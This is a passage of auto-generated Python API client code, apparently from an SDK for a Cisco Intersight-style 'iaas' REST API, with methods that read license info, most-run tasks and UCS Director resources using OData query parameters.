all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_iaas_license_info_list" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/LicenseInfos',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasLicenseInfoList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_most_run_tasks_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.MostRunTasks' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_most_run_tasks_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasMostRunTasks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_most_run_tasks_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_iaas_most_run_tasks_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'iaas.MostRunTasks' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_most_run_tasks_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasMostRunTasks, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_iaas_most_run_tasks_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_iaas_most_run_tasks_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/MostRunTasks/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasMostRunTasks', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_most_run_tasks_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.MostRunTasks' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_most_run_tasks_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasMostRunTasksList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_most_run_tasks_list_with_http_info(
**kwargs) # noqa: E501
def get_iaas_most_run_tasks_list_with_http_info(self,
**kwargs): # noqa: E501
"""Read a 'iaas.MostRunTasks' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_most_run_tasks_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasMostRunTasksList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_iaas_most_run_tasks_list" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/MostRunTasks',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasMostRunTasksList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_ucsd_info_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_info_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_ucsd_info_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_iaas_ucsd_info_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_info_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasUcsdInfo, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_iaas_ucsd_info_by_moid" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_iaas_ucsd_info_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/UcsdInfos/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasUcsdInfo', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_ucsd_info_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_info_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdInfoList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_ucsd_info_list_with_http_info(
**kwargs) # noqa: E501
def get_iaas_ucsd_info_list_with_http_info(self, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_info_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasUcsdInfoList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_iaas_ucsd_info_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/UcsdInfos',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasUcsdInfoList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_ucsd_managed_infra_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read a 'iaas.UcsdManagedInfra' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_managed_infra_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasUcsdManagedInfra
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_ucsd_managed_infra_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_iaas_ucsd_managed_infra_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdManagedInfra' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_managed_infra_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasUcsdManagedInfra, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_iaas_ucsd_managed_infra_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_iaas_ucsd_managed_infra_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/UcsdManagedInfras/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasUcsdManagedInfra', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_ucsd_managed_infra_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.UcsdManagedInfra' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_ucsd_managed_infra_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
